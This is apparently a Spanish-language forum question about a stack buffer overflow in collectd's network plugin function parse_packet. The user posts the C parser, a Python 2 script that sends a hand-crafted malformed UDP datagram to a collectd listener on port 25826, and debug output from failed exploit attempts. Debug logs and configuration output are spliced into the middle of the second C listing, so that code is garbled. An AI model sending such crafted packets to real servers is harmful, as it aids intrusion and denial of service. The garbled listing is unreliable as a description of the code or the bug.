Estoy intentando entender este fragmento de código:
Contiene una vulnerabilidad de desbordamiento de búfer de pila:
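/*
 * parse_packet - walk the parts of one received network datagram.
 *
 * Every part begins with a header made of a 16-bit type followed by a 16-bit
 * length, both in network byte order. The length counts the header itself,
 * which is why a length below 2 * sizeof (uint16_t) ends the loop.
 *
 * se          - socket entry; its server.security_level is consulted (when
 *               built with libgcrypt) and it is handed to the crypto helpers.
 * buffer      - start of the received datagram.
 * buffer_size - number of bytes available at buffer.
 * flags       - PP_SIGNED / PP_ENCRYPTED bits describing what has already
 *               been verified for this data.
 * username    - passed through to network_dispatch_values ().
 *
 * Returns 0, or the non-zero status of the first part parser that failed.
 *
 * Security note: this listing includes the bounds fix for the three branches
 * that skip a part without parsing it. They used to advance buffer by
 * pkg_length while leaving buffer_size untouched, so every later check of
 * "pkg_length > buffer_size" was made against a stale, too-large size and
 * the part parsers could be pointed past the end of the datagram.
 *
 * NOTE(review): the parse_part_* helpers receive &buffer and &buffer_size and
 * presumably advance both on success - confirm against their definitions.
 */
static int parse_packet (sockent_t *se, /* {{{ */
    void *buffer, size_t buffer_size, int flags,
    const char *username)
{
  int status;

  value_list_t vl = VALUE_LIST_INIT;
  notification_t n;

#if HAVE_LIBGCRYPT
  int packet_was_signed = (flags & PP_SIGNED);
  int packet_was_encrypted = (flags & PP_ENCRYPTED);
  int printed_ignore_warning = 0;
#endif /* HAVE_LIBGCRYPT */

  /* Start from all-zero state so no stale stack contents are dispatched. */
  memset (&vl, '\0', sizeof (vl));
  memset (&n, '\0', sizeof (n));
  status = 0;

  while ((status == 0) && (0 < buffer_size)
      && ((unsigned int) buffer_size > sizeof (part_header_t)))
  {
    uint16_t pkg_length;
    uint16_t pkg_type;

    /* Copy the header fields out byte-wise; buffer carries no alignment
     * guarantee. The cast to char * avoids arithmetic on a void pointer. */
    memcpy ((void *) &pkg_type,
        (void *) buffer,
        sizeof (pkg_type));
    memcpy ((void *) &pkg_length,
        (void *) (((char *) buffer) + sizeof (pkg_type)),
        sizeof (pkg_length));

    pkg_length = ntohs (pkg_length);
    pkg_type = ntohs (pkg_type);

    /* A part may never claim more bytes than are left in the datagram. */
    if (pkg_length > buffer_size)
      break;
    /* Ensure that this loop terminates eventually */
    if (pkg_length < (2 * sizeof (uint16_t)))
      break;

    if (pkg_type == TYPE_ENCR_AES256)
    {
      status = parse_part_encr_aes256 (se,
          &buffer, &buffer_size, flags);
      if (status != 0)
      {
        ERROR ("network plugin: Decrypting AES256 "
            "part failed "
            "with status %i.", status);
        break;
      }
    }
#if HAVE_LIBGCRYPT
    else if ((se->data.server.security_level == SECURITY_LEVEL_ENCRYPT)
        && (packet_was_encrypted == 0))
    {
      if (printed_ignore_warning == 0)
      {
        INFO ("network plugin: Unencrypted packet or "
            "part has been ignored.");
        printed_ignore_warning = 1;
      }
      /* Skip the part: cursor and remaining size must move together.
       * pkg_length <= buffer_size was checked above, so this cannot wrap. */
      buffer = ((char *) buffer) + pkg_length;
      buffer_size -= (size_t) pkg_length;
      continue;
    }
#endif /* HAVE_LIBGCRYPT */
    else if (pkg_type == TYPE_SIGN_SHA256)
    {
      status = parse_part_sign_sha256 (se,
          &buffer, &buffer_size, flags);
      if (status != 0)
      {
        ERROR ("network plugin: Verifying HMAC-SHA-256 "
            "signature failed "
            "with status %i.", status);
        break;
      }
    }
#if HAVE_LIBGCRYPT
    else if ((se->data.server.security_level == SECURITY_LEVEL_SIGN)
        && (packet_was_encrypted == 0)
        && (packet_was_signed == 0))
    {
      if (printed_ignore_warning == 0)
      {
        INFO ("network plugin: Unsigned packet or "
            "part has been ignored.");
        printed_ignore_warning = 1;
      }
      /* Same rule as above: shrink buffer_size by what is skipped. */
      buffer = ((char *) buffer) + pkg_length;
      buffer_size -= (size_t) pkg_length;
      continue;
    }
#endif /* HAVE_LIBGCRYPT */
    else if (pkg_type == TYPE_VALUES)
    {
      status = parse_part_values (&buffer, &buffer_size,
          &vl.values, &vl.values_len);
      if (status != 0)
        break;

      network_dispatch_values (&vl, username);

      sfree (vl.values);
    }
    else if (pkg_type == TYPE_TIME)
    {
      uint64_t tmp = 0;
      status = parse_part_number (&buffer, &buffer_size,
          &tmp);
      if (status == 0)
      {
        vl.time = TIME_T_TO_CDTIME_T (tmp);
        n.time = TIME_T_TO_CDTIME_T (tmp);
      }
    }
    else if (pkg_type == TYPE_TIME_HR)
    {
      uint64_t tmp = 0;
      status = parse_part_number (&buffer, &buffer_size,
          &tmp);
      if (status == 0)
      {
        vl.time = (cdtime_t) tmp;
        n.time = (cdtime_t) tmp;
      }
    }
    else if (pkg_type == TYPE_INTERVAL)
    {
      uint64_t tmp = 0;
      status = parse_part_number (&buffer, &buffer_size,
          &tmp);
      if (status == 0)
        vl.interval = TIME_T_TO_CDTIME_T (tmp);
    }
    else if (pkg_type == TYPE_INTERVAL_HR)
    {
      uint64_t tmp = 0;
      status = parse_part_number (&buffer, &buffer_size,
          &tmp);
      if (status == 0)
        vl.interval = (cdtime_t) tmp;
    }
    else if (pkg_type == TYPE_HOST)
    {
      /* String parts are parsed into the fixed-size vl field (its size is
       * passed along) and then mirrored into the notification. */
      status = parse_part_string (&buffer, &buffer_size,
          vl.host, sizeof (vl.host));
      if (status == 0)
        sstrncpy (n.host, vl.host, sizeof (n.host));
    }
    else if (pkg_type == TYPE_PLUGIN)
    {
      status = parse_part_string (&buffer, &buffer_size,
          vl.plugin, sizeof (vl.plugin));
      if (status == 0)
        sstrncpy (n.plugin, vl.plugin,
            sizeof (n.plugin));
    }
    else if (pkg_type == TYPE_PLUGIN_INSTANCE)
    {
      status = parse_part_string (&buffer, &buffer_size,
          vl.plugin_instance,
          sizeof (vl.plugin_instance));
      if (status == 0)
        sstrncpy (n.plugin_instance,
            vl.plugin_instance,
            sizeof (n.plugin_instance));
    }
    else if (pkg_type == TYPE_TYPE)
    {
      status = parse_part_string (&buffer, &buffer_size,
          vl.type, sizeof (vl.type));
      if (status == 0)
        sstrncpy (n.type, vl.type, sizeof (n.type));
    }
    else if (pkg_type == TYPE_TYPE_INSTANCE)
    {
      status = parse_part_string (&buffer, &buffer_size,
          vl.type_instance,
          sizeof (vl.type_instance));
      if (status == 0)
        sstrncpy (n.type_instance, vl.type_instance,
            sizeof (n.type_instance));
    }
    else if (pkg_type == TYPE_MESSAGE)
    {
      status = parse_part_string (&buffer, &buffer_size,
          n.message, sizeof (n.message));

      /* A notification is dispatched only when severity, time and message
       * have all been set to usable values by earlier parts. */
      if (status != 0)
      {
        /* do nothing */
      }
      else if ((n.severity != NOTIF_FAILURE)
          && (n.severity != NOTIF_WARNING)
          && (n.severity != NOTIF_OKAY))
      {
        INFO ("network plugin: "
            "Ignoring notification with "
            "unknown severity %i.",
            n.severity);
      }
      else if (n.time <= 0)
      {
        INFO ("network plugin: "
            "Ignoring notification with "
            "time == 0.");
      }
      else if (strlen (n.message) <= 0)
      {
        INFO ("network plugin: "
            "Ignoring notification with "
            "an empty message.");
      }
      else
      {
        plugin_dispatch_notification (&n);
      }
    }
    else if (pkg_type == TYPE_SEVERITY)
    {
      uint64_t tmp = 0;
      status = parse_part_number (&buffer, &buffer_size,
          &tmp);
      if (status == 0)
        n.severity = (int) tmp;
    }
    else
    {
      DEBUG ("network plugin: parse_packet: Unknown part"
          " type: 0x%04hx", pkg_type);
      /* Unknown part types are skipped, again keeping the size in step. */
      buffer = ((char *) buffer) + pkg_length;
      buffer_size -= (size_t) pkg_length;
    }
  } /* while (buffer_size > sizeof (part_header_t)) */

  /* Bytes left over without an error mean the last part did not fit. */
  if (status == 0 && buffer_size > 0)
    WARNING ("network plugin: parse_packet: Received truncated "
        "packet, try increasing 'MaxPacketSize'");

  return (status);
} /* }}} int parse_packet */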
Fue parcheado con esto:
Pasé un tiempo investigándolo pero no puedo encontrar el error ...
¿Alguien puede ayudar?
Actualización 1:
Gracias por las respuestas, especialmente @grochmal
Mi intento de hacer un desbordamiento de búfer / desbordamiento de pila:
# Test sender: builds one UDP datagram by hand for a collectd network listener.
# Python 2 syntax (print statement).
import socket
# Loopback address: the datagram goes to a listener on the local machine.
UDP_IP = "127.0.0.1"
# 25826 is the default UDP port of collectd's network plugin.
UDP_PORT = 25826
print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT
# Connectionless IPv4 datagram socket.
sock = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
str="\x00\x05\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"
sock.sendto(str,(UDP_IP, UDP_PORT))
Pero de alguna manera no consigo pasar del búfer... Si pongo pkg_length a 67 en el último paquete, obtengo esto:
static int parse_packet (sockent_t *se, /* {{{ */
void *buffer, size_t buffer_size, int flags,
const char *username)
{
int status;
value_list_t vl = VALUE_LIST_INIT;
notification_t n;
#if HAVE_LIBGCRYPT
int packet_was_signed = (flags & PP_SIGNED);
int packet_was_encrypted = (flags & PP_ENCRYPTED);
int printed_ignore_warning = 0;
#endif /* HAVE_LIBGCRYPT */
memset (&vl, ' parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F74000
05F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump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
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump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
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:66
', sizeof (vl));
memset (&n, 'option = Hostname; value = 127.0.0.1;
option = FQDNLookup; value = true;
option = BaseDir; value = /opt/collectd/var/lib/collectd;
option = PIDFile; value = /opt/collectd/var/run/collectd.pid;
Done parsing '/opt/collectd/share/collectd/types.db'
Created new plugin context.
parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump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
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump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
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:430005004300050143000502430005034300050443000505430005064300050743000508430005094300050A4300050B4300050C4300050D4300050E4300050F430005104300051143000512430005134300051443000515430005164300051743000518430005194300051A4300051B4300051C4300051D4300051E4300051F430005204300052143000522430005234300052443000525430005264300052743000528430005294300052A4300052B4300052C4300052D4300052E4300052F430005304300053143000532430005334300053443000535430005364300053743000538430005394300053A4300053B4300053C4300053D4300053E4300053F4300054043000541
pkg_length:17152
pkg_type:1280
pkg_length(ntohs):67
pkg_type(ntohs):5
Break pkg_length > buffer_size
', sizeof (n));
status = 0;
while ((status == 0) && (0 < buffer_size)
&& ((unsigned int) buffer_size > sizeof (part_header_t)))
{
uint16_t pkg_length;
uint16_t pkg_type;
memcpy ((void *) &pkg_type,
(void *) buffer,
sizeof (pkg_type));
memcpy ((void *) &pkg_length,
(void *) (buffer + sizeof (pkg_type)),
sizeof (pkg_length));
pkg_length = ntohs (pkg_length);
pkg_type = ntohs (pkg_type);
if (pkg_length > buffer_size)
break;
/* Ensure that this loop terminates eventually */
if (pkg_length < (2 * sizeof (uint16_t)))
break;
if (pkg_type == TYPE_ENCR_AES256)
{
status = parse_part_encr_aes256 (se,
&buffer, &buffer_size, flags);
if (status != 0)
{
ERROR ("network plugin: Decrypting AES256 "
"part failed "
"with status %i.", status);
break;
}
}
#if HAVE_LIBGCRYPT
else if ((se->data.server.security_level == SECURITY_LEVEL_ENCRYPT)
&& (packet_was_encrypted == 0))
{
if (printed_ignore_warning == 0)
{
INFO ("network plugin: Unencrypted packet or "
"part has been ignored.");
printed_ignore_warning = 1;
}
buffer = ((char *) buffer) + pkg_length;
continue;
}
#endif /* HAVE_LIBGCRYPT */
else if (pkg_type == TYPE_SIGN_SHA256)
{
status = parse_part_sign_sha256 (se,
&buffer, &buffer_size, flags);
if (status != 0)
{
ERROR ("network plugin: Verifying HMAC-SHA-256 "
"signature failed "
"with status %i.", status);
break;
}
}
#if HAVE_LIBGCRYPT
else if ((se->data.server.security_level == SECURITY_LEVEL_SIGN)
&& (packet_was_encrypted == 0)
&& (packet_was_signed == 0))
{
if (printed_ignore_warning == 0)
{
INFO ("network plugin: Unsigned packet or "
"part has been ignored.");
printed_ignore_warning = 1;
}
buffer = ((char *) buffer) + pkg_length;
continue;
}
#endif /* HAVE_LIBGCRYPT */
else if (pkg_type == TYPE_VALUES)
{
status = parse_part_values (&buffer, &buffer_size,
&vl.values, &vl.values_len);
if (status != 0)
break;
network_dispatch_values (&vl, username);
sfree (vl.values);
}
else if (pkg_type == TYPE_TIME)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
{
vl.time = TIME_T_TO_CDTIME_T (tmp);
n.time = TIME_T_TO_CDTIME_T (tmp);
}
}
else if (pkg_type == TYPE_TIME_HR)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
{
vl.time = (cdtime_t) tmp;
n.time = (cdtime_t) tmp;
}
}
else if (pkg_type == TYPE_INTERVAL)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
vl.interval = TIME_T_TO_CDTIME_T (tmp);
}
else if (pkg_type == TYPE_INTERVAL_HR)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
vl.interval = (cdtime_t) tmp;
}
else if (pkg_type == TYPE_HOST)
{
status = parse_part_string (&buffer, &buffer_size,
vl.host, sizeof (vl.host));
if (status == 0)
sstrncpy (n.host, vl.host, sizeof (n.host));
}
else if (pkg_type == TYPE_PLUGIN)
{
status = parse_part_string (&buffer, &buffer_size,
vl.plugin, sizeof (vl.plugin));
if (status == 0)
sstrncpy (n.plugin, vl.plugin,
sizeof (n.plugin));
}
else if (pkg_type == TYPE_PLUGIN_INSTANCE)
{
status = parse_part_string (&buffer, &buffer_size,
vl.plugin_instance,
sizeof (vl.plugin_instance));
if (status == 0)
sstrncpy (n.plugin_instance,
vl.plugin_instance,
sizeof (n.plugin_instance));
}
else if (pkg_type == TYPE_TYPE)
{
status = parse_part_string (&buffer, &buffer_size,
vl.type, sizeof (vl.type));
if (status == 0)
sstrncpy (n.type, vl.type, sizeof (n.type));
}
else if (pkg_type == TYPE_TYPE_INSTANCE)
{
status = parse_part_string (&buffer, &buffer_size,
vl.type_instance,
sizeof (vl.type_instance));
if (status == 0)
sstrncpy (n.type_instance, vl.type_instance,
sizeof (n.type_instance));
}
else if (pkg_type == TYPE_MESSAGE)
{
status = parse_part_string (&buffer, &buffer_size,
n.message, sizeof (n.message));
if (status != 0)
{
/* do nothing */
}
else if ((n.severity != NOTIF_FAILURE)
&& (n.severity != NOTIF_WARNING)
&& (n.severity != NOTIF_OKAY))
{
INFO ("network plugin: "
"Ignoring notification with "
"unknown severity %i.",
n.severity);
}
else if (n.time <= 0)
{
INFO ("network plugin: "
"Ignoring notification with "
"time == 0.");
}
else if (strlen (n.message) <= 0)
{
INFO ("network plugin: "
"Ignoring notification with "
"an empty message.");
}
else
{
plugin_dispatch_notification (&n);
}
}
else if (pkg_type == TYPE_SEVERITY)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
n.severity = (int) tmp;
}
else
{
DEBUG ("network plugin: parse_packet: Unknown part"
" type: 0x%04hx", pkg_type);
buffer = ((char *) buffer) + pkg_length;
}
} /* while (buffer_size > sizeof (part_header_t)) */
if (status == 0 && buffer_size > 0)
WARNING ("network plugin: parse_packet: Received truncated "
"packet, try increasing 'MaxPacketSize'");
return (status);
} /* }}} int parse_packet */
Actualización 2:
Hmmmm... no funciona... Estaba intentando desbordar los valores en parse_part_values(), pero hay una comprobación para esto:
Hmmmm ... aquí se detiene:
[2017-02-12 16:43:18] complemento de red: parse_part_values: paquete demasiado corto: se espera un fragmento del tamaño 726, pero el búfer solo tiene 51 bytes.
Aquí está el código que produce arriba:
exp.py
# Test sender: builds one UDP datagram by hand for a collectd network listener.
# Python 2 syntax (print statement).
import socket
# Loopback address: the datagram goes to a listener on the local machine.
UDP_IP = "127.0.0.1"
# 25826 is the default UDP port of collectd's network plugin.
UDP_PORT = 25826
print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT
# Connectionless IPv4 datagram socket.
sock = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
str="\x00\x05\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"
sock.sendto(str,(UDP_IP, UDP_PORT))
A continuación se muestra la trama enviada por el código anterior, diseccionada en Wireshark: